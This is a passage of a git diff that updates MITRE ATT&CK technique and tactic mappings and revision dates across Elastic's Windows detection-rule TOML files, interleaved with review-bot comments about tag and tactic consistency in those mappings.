6fcd26f682b..fc830cb9c34 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
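Review bot: The T1218 block added to execution_suspicious_pdf_reader enumerates six System Binary Proxy Execution subtechniques (CMSTP, InstallUtil, Mshta, Odbcconf, Regsvcs/Regasm, Regsvr32) plus four Discovery techniques under TA0007, which presumably mirrors the child-process and command list in the rule's query. That query is outside the hunk, so it is worth confirming each listed binary and discovery command is actually matched by the rule before shipping the mapping; over-broad ATT&CK coverage for one rule skews the repository's coverage reporting and can mislead triage on the resulting alert. A short note in the rule's `note` or the PR description stating which query clause each new technique corresponds to would make the mapping reviewable without re-deriving it.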
@@ -80,36 +80,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index 15d381da770..527d9eae410 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -145,36 +145,56 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index df930dae4f7..1561c064fc1 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,38 +107,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 52678af5806..4d0567ab563 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
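Review bot: In execution_via_hidden_shell_conhost the separate TA0004 Privilege Escalation `[[rule.threat]]` entry is removed and T1055 Process Injection is folded under the Defense Evasion tactic, but no hunk in this file touches the `tags` array, so a `"Tactic: Privilege Escalation"` tag, if present, becomes an orphan with no backing tactic and would trip the orphan-tag side of the tag/tactic consistency check. The consolidation itself is defensible since T1055 sits under both tactics in ATT&CK; the fix is to drop the stale tag in the same change so the rule stays internally consistent.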
@@ -106,10 +106,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" @@ -120,27 +122,35 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 9d8c461049c..7e8578f6b1a 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -161,19 +161,59 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index f2fdff5ae2b..3b73fe7f124 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -98,47 +100,58 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index 499cedf6295..ff9f43a3a9f 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,10 +83,12 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -97,45 +99,61 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index ff0cfea3021..12f07fbe1e5 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -186,19 +186,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index b0f8b6c40d2..1df195731bd 100644 --- a/rules/windows/execution_windows_script_from_internet.toml 
+++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -93,6 +93,16 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" @@ -103,23 +113,29 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" @@ -130,10 +146,7 @@ id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 48377c25e27..b66cc9b1c73 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,12 +84,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 1e007cf4c87..5811c56fa8d 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,17 +117,29 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index e2d3edbbce1..8cbbdcf1d46 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,30 +86,41 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 7aa911b6309..6453a27428d 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -93,18 +93,28 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7f585c29ae5..06640b4a521 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,36 +82,41 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index 392a87fdba2..ed12fe35795 100644 --- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,36 +82,41 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_stop_process_service_threshold.toml b/rules/windows/impact_stop_process_service_threshold.toml index e6e6087c445..1c69ec5bafb 100644 --- a/rules/windows/impact_stop_process_service_threshold.toml +++ b/rules/windows/impact_stop_process_service_threshold.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/03" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/06/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -80,17 +80,34 @@ event.category:process and host.os.type:windows and event.type:start and process [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["host.id"] value = 10 diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index 073eef3b42a..39ada5349f6 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
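Review bot: The new `[[rule.threat]]` block mapping TA0005 Defense Evasion (T1562 / T1562.001) has no matching `Tactic: Defense Evasion` entry visible in this hunk; `rule.tags` lives earlier in the file and is not shown, so if it was not updated separately the rule's tags and its threat mapping will disagree and a tactic-to-tag consistency check would flag it. The same check applies to every other hunk in this patch that introduces a tactic the rule did not previously map: Execution in initial_access_evasion_suspicious_htm_file_creation.toml, initial_access_execution_from_inetcache.toml, initial_access_execution_via_office_addins.toml, initial_access_potential_webhelpdesk_exploit.toml and initial_access_rdp_file_mail_attachment.toml; Command and Control in initial_access_execution_remote_via_msiexec.toml and initial_access_suspicious_execution_from_vscode_extension.toml; Defense Evasion in initial_access_exploit_jetbrains_teamcity.toml, initial_access_potential_webhelpdesk_exploit.toml and initial_access_suspicious_execution_from_vscode_extension.toml; Persistence in initial_access_suspicious_ms_exchange_files.toml and initial_access_suspicious_ms_exchange_worker_child_process.toml; Discovery in initial_access_exploit_jetbrains_teamcity.toml and initial_access_suspicious_ms_office_child_process.toml. Each of those needs the corresponding `Tactic: <name>` tag confirmed present, since the tag is what the ATT&CK coverage tooling keys on.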
